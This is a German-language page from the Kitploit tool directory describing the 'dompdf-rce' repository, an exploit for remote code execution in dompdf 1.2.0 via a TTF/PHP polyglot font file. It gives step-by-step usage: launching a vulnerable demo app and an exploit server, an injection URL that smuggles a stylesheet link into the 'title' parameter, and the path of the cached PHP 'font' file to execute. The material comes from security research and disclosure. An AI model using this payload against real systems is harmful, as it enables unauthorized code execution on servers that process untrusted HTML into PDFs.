Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
dompdf-rce — RCE-Exploit für dompdf | Kitploit
Tools/GitHubGitHub/positive-security/dompdf-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPayload-Entwicklung
GitHubpositive-security/dompdf-rce

dompdf-rce

RCE-Exploit für dompdf

Repository anzeigen
179652vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RCE-Exploit für dompdf

Dieses Repository enthält eine verwundbare Demo-Anwendung, die dompdf 1.2.0 verwendet, und einen Exploit, der Remote-Code-Ausführung über eine ttf+php-Polyglot-Datei erreicht.

Exploit-Übersicht

Für weitere Details siehe https://positive.security/blog/dompdf-rce

Anleitung

  1. Starte die Demo-Anwendung
root@kitploit:~
$ cd application
$ php -S localhost:9000
  1. Starte den Exploit-Server
root@kitploit:~
$ cd exploit
$ php -S localhost:9001
  1. Löse den Exploit aus
root@kitploit:~
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
  1. Greife auf die gecachte PHP-"Font"-Datei zu und führe phpinfo() aus
root@kitploit:~
http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php

Bitte beachte: Falls du andere Domains oder Ports verwendest, bearbeite entsprechend und prüfe in den vollständigen Font-Dateinamen.

Tool herunterladen
exploit/exploit.css
application/dompdf/lib/fonts